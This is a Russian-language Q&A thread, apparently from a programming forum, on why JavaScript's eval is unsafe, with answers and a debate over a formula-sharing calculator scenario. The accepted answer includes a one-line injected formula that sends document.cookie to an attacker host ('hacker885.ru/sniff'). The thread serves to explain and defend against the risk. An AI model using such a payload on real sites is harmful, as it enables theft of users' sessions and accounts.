# Почему использование "eval" в языке JavaScript считается небезопасным?

Tags: javascript, безопасность, eval

В мире JavaScript разработчиков существует устоявшаяся фраза:

> "Eval is evil" (eval — это зло)

Почему и в каких случаях использование `eval` в JavaScript является небезопасным? Если JavaScript выполняется на стороне клиента, то каким образом злоумышленник может взломать сайт?

Исполнять код позволяют стандартные инструменты разработчика многих браузеров: каждый желающий может исполнить JavaScript код, например, в браузере Google Chrome, введя этот код в консоль.

То есть, как мне кажется (поверхностно), единственное, что может сделать злоумышленник — это навредить самому себе, потому что все его изменения сможет увидеть только он. Однако существует мнение, что с помощью `eval` можно произвести кражу персональных данных **других** пользователей? Каков механизм?

Почему `eval` относят к небезопасным методам? Если кто-нибудь знает, какую конкретно угрозу может принести этот метод, пожалуйста, опишите ситуацию и приведите пример кода.

Comment: Тут подробно уже отвечено

http://stackoverflow.com/questions/86513/why-is-using-the-javascript-eval-function-a-bad-idea

(тридцать букав)

Comment: Пример (1). Получаете json-данные со стороннего сайта, и парсите, не `JSON.parse` а `eval`. Владелец стороннего сайта не заботится о безопасности и злоумышленник этим пользуется со всеми вытекающими (для Вас).

Comment: @vladiik По возможности, пожалуйста, публикуйте ответ целиком, дополняя его ссылкой.

Answer (score 10, accepted):

Ну смотрите. Допустим, мы написали калькулятор в котором можно зарегистрироваться и обмениваться формулами (т.е. серверная часть где хранятся как минимум учетные данные пользователей). Цель атакующего - получение доступа к учетной записи пользователи, или администратора данного ресурса.

**Сам калькулятор работает так**: при нажатии какой-нибудь цифровой или с символом математической операций клавиши, мы добавляем его к строке `expr`, в результате у нас получается:

```
expr = '5 + 2 * 3';
```

Когда мы нажимаем знак "=" - то выполняется `eval`:

```
var result = eval(expr);
```

**Этап взлома**:
Если злоумышленник отправит формулу где помимо математического содержимого будет код на javascript, то тому кому это будет отправлено, вместе с формулой запустит и вредоносный скрипт. Формула, полученная от злоумышленника, может выглядеть так:

```
expr = '(document.createElement("img")).src="http://hacker885.ru/sniff?c=" + document.cookie, 5 + 2 * 3';
```

**В результате**: злоумышленник сможет: получить *куки*, доступ к *local/session storage*, к содержимому страницы, попытается закачать что-нибудь (вирус например).

**Плюс**:
Если таким путем мы отправим это сообщение к администратору ресурса, то благодаря полученным нами правам, возможно сможем добраться до бекенда ресурса.

На месте калькулятора может быть что-то более весомое: например e-learning портал.

Как-то так)

---

**p.s.**

Немного не по теме, но хочу затронуть ибо встречается.

Честно говоря, найти задачу где было бы действительно необходимо использовать eval - сложно, все, что мне попадалось - было связано с подобием калькулятора или визуализатора математических формул.

Могу сказать, что при желании написать разбор математических выражений не сложно. В свободное время набросал такой вот парсер: http://jsfiddle.net/kadymov/6d79wmfg/4/ . Он немного не дописан, но уже работает, а занимает 150 строк.

Используйте конкретные средства для конкретных задач, а eval если где и оставлять - то только на стадии прототипа.

Comment: Вы имеете в виду, что eval выполняется на сервере? Если нет, т.е. в локальном браузере, то видимо "злоумышленник" и пользователь калькулятора это одно лицо (иначе опишите, откуда он тут появиться). И зачем тогда ему такие выкрутасы для доступа к кукам и т.п.?

Comment: Нет, на сервере 'eval' не выполняется. И злоумышленник и пользователь зарегистрированы на сайте как разные пользователи калькулятора. Цель атакующего - получение доступа к учетной записи.   Разумеется это выдуманный пример, но на месте калькулятора может быть что-то более весомое: например e-learning портал.

Comment: Можно добавить, что использование eval - зло на любом языке программирования, который имеет этот или аналогичный инструмент. Особенно в случае сетевых приложений

Comment: @AleksanderK., тогда пример (безотносительно калькулятора) настолько искусственный, что просто не работает. Злоумышленник может и без локально исполняемого eval сделать в браузере (или другой локальной программе) все то, что в Вашем примере он делает, используя eval. Следовательно, к защите сайта этот пример отношения не имеет.

Comment: @skegg, я бы не стал так категорически это утверждать. Конечно, неконтролируемый eval  в (гипотетически широко распространенных)  сетевых приложениях провоцирует на разработку распределенных атак (не знаю, насколько успешных, но жрущих ресурсы сети -- это точно).

Comment: @avp, объясните каким образом, без использования дыры с `eval`, злоумышленник, не имеющий прямого доступа к машине пользователя, сможет отправить данные куков на подконтрольную себе машину, в условиях данной задачи?

Приведу пример: попытка XSS, в базу или в url отправляемого выражения добавлен скрипт `<script>...</script>`. Вывод полученного сообщения устанавливается через innerText, в результате на клиенте ничего кроме вывода текста не происходит.

Comment: Никаким. Также как и с помощью eval (поскольку последнее условие -- он *не имеет доступа к машине пользователя*, а значит и к злополучному eval). / А XSS это уже совсем другая задача -- это внедрение на стороне сервера. / Вы какую-то совсем гипотетическую схему пытаетесь нарисовать.  Ломаем сервер, подменяя текст страницы, которая будет выполняться на клиенте с целью получить данные с локальных машин. А eval-то, который недотепа-программист хочет использовать, тут причем? Наверное, если мы опасаемся таких штук, то надо на строне сервера проверять не скомпроментировано ли ПО.

Comment: @avp
Мне кажется мы говорим о разном. Метод `eval` - тот, что в JavaScript на клиентской стороне. Для использовании его необходимо иметь возможность передать ему строку с вредоносным кодом. Таким образом клиенту достаточно (по условию задачи) открыть данные (мат. выражение) и, для отображения результата (результата вычисления или для построения графика), вызвать eval с передачей в нее вредоносного кода. Таким образом физического доступа к компьютеру жертвы не нужно. Ломать сервер нам не надо на данном этапе, т.к. это лишь фаза для достижения этой цели, а не наоборот.

Comment: Непонятным остается маленький вопрос -- каким образом злоумышленник на компьютере жертвы (к которому у него нет доступа) подсунет в eval свой код. Как обладатель компа вводит туда код -- понятно, а сторонний злоумышленник -- нет. Если же владелец компа это и есть злоумышленник, то он (как я писал раньше) все свои злодеяния проворачивает и без наличия eval в коде страницы.

Comment: Ох. Одна из функций системы - *обмен формулами*. Он сохранит формулу на сервере, в своем личном кабинете, а потом скинет ссылку на формулу другому человеку. Когда тот ее откроет, *для ее расчета* выполниться уязвимый скрипт использующий `eval`. *Физического* доступа не было.

Comment: @avp И, кстати, XSS - вид атаки на пользователя, направленный на выполнение в браузере произвольного сценария в контексте конкретного сайта для обхода политик безопасности единого источника. Для реализации некоторых из ее видов вовсе не обязательно хранить какие-то данные в базе. Доступ к бекенду она не открывает, выполняется только на клиенте. Как и код в eval - цель получение контекста. Поэтому считаю уместным сравнивать эти вектора атак. *Дальнейшие обсуждение, если будут, наверное, следовало бы вынести в чат*.

Comment: OK. XSS я перепутал с SQL-injection. / Ну, вот теперь, когда Вы уточнили про обмен формулами сценарий уязвимости eval обрел реальные черты. / Однако, согласитесь, что выполнение произвольного непроверенного кода в приложении -- это довольно надуманная ситуация.

Comment: Я догадывался, что перепутали;
Специально зашел в историю правок ответа, с первой версии, в первой строке: *"Допустим, мы написали калькулятор в котором можно зарегистрироваться и обмениваться формулами."*;
По поводу надуманности - когда-то я работал с одной крупной системой электронного обучения, так вот там я вполне смог бы провернуть это;
На всякий раз уточню, что под "непроверенным кодом" подразумевается javaScript, а не бинарный, заинжекченый через эксплойт.

Comment: http://jsfiddle.net/kadymov/6d79wmfg/4/  - какой-то он сложный... Чем простой не угодил?

Comment: Простой - это какой? eval и то что в ссылке это немного разные вещи. Написать простой математический интерпретатор - прикольно, расширяемо и безопасно. Понятно что если в калькуляторе только цифры и мат-символы то можно и регуляркой проверить. А вообще это скорее эксперимент чем конкретное решение.

Answer (score 4):

1. Eval проверенных данных в плане безопасности вреда не несёт.
2. Далеко не все данные, которые кажутся проверенными, являются таковыми.
   Например, сервер может прислать нечто написанное другим пользователем, что содержит вредоносный скрипт. Или параметры могут браться из адреса, а то и из его hash-фрагмента. Переход на такую страницу будет сделан по простой ссылке, а код разместившего ссылку будет выполнен на странице твоего домена.
3. Eval снижает производительность. А современные браузеры очень заточены на оптимизации, чуть ли не до уровня компиляции в нативный код.
   Один прямой вызов eval - и этому конец.
   Любая функция, содержащая прямой вызов eval не может быть оптимизирована браузером, поскольку код выполняется в её контексте. Она должна будет сохранить доступ ко всем переменным, находящимся выше по цепочке замыканий, вполне возможно, продлевая тем самым жизнь тому, что должно было быть собрано сборщиком мусора.
4. Непрямой вызов eval выполняет код в глобальном контексте.
   Распространённый вариант использования - получение глобального объекта.
5. В большинстве случаев вызов eval может быть заменён на new Function.
6. *А зачем бы ты хотел использовать eval?*
   Весьма вероятно, что для этого найдётся лучший вариант.